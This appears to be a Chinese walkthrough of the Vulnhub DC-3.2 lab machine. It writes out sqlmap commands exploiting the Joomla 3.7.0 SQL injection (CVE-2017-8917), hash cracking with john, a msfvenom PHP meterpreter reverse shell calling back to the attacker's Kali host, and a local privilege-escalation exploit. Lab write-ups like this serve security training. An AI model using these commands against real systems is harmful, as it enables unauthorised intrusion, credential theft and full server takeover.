Vulnhub靶场----3、DC-3.2

文章目录

  • 一、环境搭建
  • 二、渗透流程
  • 三、思路总结


一、环境搭建

靶场下载地址:https://download.vulnhub.com/dc/DC-3-2.zip
kali:192.168.144.148
DC-3.2:192.168.144.151

更改驱动器连接设置:
Vulnhub靶场----3、DC-3.2_第1张图片


二、渗透流程

1、信息收集
nmap -T5 -sV -sT -p- -A 192.168.144.151
Vulnhub靶场----3、DC-3.2_第2张图片

2、探测网站内容

1.访问192.168.144.151

Vulnhub靶场----3、DC-3.2_第3张图片


2.web指纹扫描如下

网站使用joomla CMS,使用joomscan工具扫描
joomscan --url 192.168.144.151
点击了解joomscan扫描工具使用详解

Vulnhub靶场----3、DC-3.2_第4张图片


3.漏洞获取

可用信息:获取到joomla版本3.7.0>寻找相关版本漏洞:searchsploit joomla 3.7.0 -w
搜索结果显示两个漏洞:
CVE-2015-8562 反序列化漏洞:https://www.exploit-db.com/exploits/43488
CVE-2017-8917 SQL注入漏洞:https://www.exploit-db.com/exploits/42033


CVE-2015-8562 反序列化漏洞
CVE-2017-8917 SQL注入漏洞


3、 CVE-2017-8917 SQL注入漏洞利用

exploits-db数据库记录了详细的利用过程,如下:

Vulnhub靶场----3、DC-3.2_第5张图片


1.获取数据库

sqlmap -u "http://192.168.144.151/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Vulnhub靶场----3、DC-3.2_第6张图片


2.joomladb数据库的表

sqlmap -u "http://192.168.144.151/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables
Vulnhub靶场----3、DC-3.2_第7张图片


3.“#__users” 表的字段

sqlmap -u "http://192.168.144.151/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump 
Vulnhub靶场----3、DC-3.2_第8张图片


4.密码解密

password采用bcrypt加密
bcrypt加密算法详解
使用john破解密码:snoopy
vi创建dc-3.2,将密码保存到dc-3.2
john爆破密码 john dc-3.2 --show 密码为:snoopy

Vulnhub靶场----3、DC-3.2_第9张图片


5.进入后台

admin:snoopy登陆后台地址:http://192.168.144.151/administrator

Vulnhub靶场----3、DC-3.2_第10张图片
4、获取权限

Vulnhub靶场----3、DC-3.2_第11张图片 Vulnhub靶场----3、DC-3.2_第12张图片


1.生成反弹shell
将shell内容复制到刚创建的dc.php文件中

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.144.148 LPORT=4444 > dc.php
Vulnhub靶场----3、DC-3.2_第13张图片


2.kali开启监听:

use exploit/multi/handler
set payload /php/meterpreter/reverse_tcp
set LHOST 192.168.144.148
set LPORT 4444
run


3.访问webshell地址
http://192.168.144.151/templates/protostar/dc.php
Vulnhub靶场----3、DC-3.2_第14张图片


4.获取临时shell

shell  #获取临时shell 
python -c 'import pty;pty.spawn("/bin/bash")'    #交互式shell
Vulnhub靶场----3、DC-3.2_第15张图片
5、提权


1.获取服务器版本

uname -a
lsb_release -a
Vulnhub靶场----3、DC-3.2_第16张图片


2.ubuntu 16.04 相关漏洞

searchsploit ubuntu 16.04 
Vulnhub靶场----3、DC-3.2_第17张图片


3.下载提权exp

cat /usr/share/exploitdb/exploits/linux/local/39772.txt  


4.通过蚁剑将exploit.tar上传至脚本所在目录
Vulnhub靶场----3、DC-3.2_第18张图片

5.解压exploit.tar
Vulnhub靶场----3、DC-3.2_第19张图片

6.获取root权限
Vulnhub靶场----3、DC-3.2_第20张图片


三、思路总结

1、只开放80端口的情况下,网站指纹、目录扫描等方向
2、通过网站CMS版本信息搜索相关版本漏洞
3、利用版本SQL注入漏洞获取后台登录账号密码
4、后台寻找webshell插入地址
5、获取shell,寻找服务器版本漏洞
6、利用服务器版本漏洞提权

参考链接:https://blog.mzfr.me/vulnhub-writeups/2019-07-12-DC3

你可能感兴趣的:(靶场集合,#,Vulnhub,vulnhub,DC-3.2)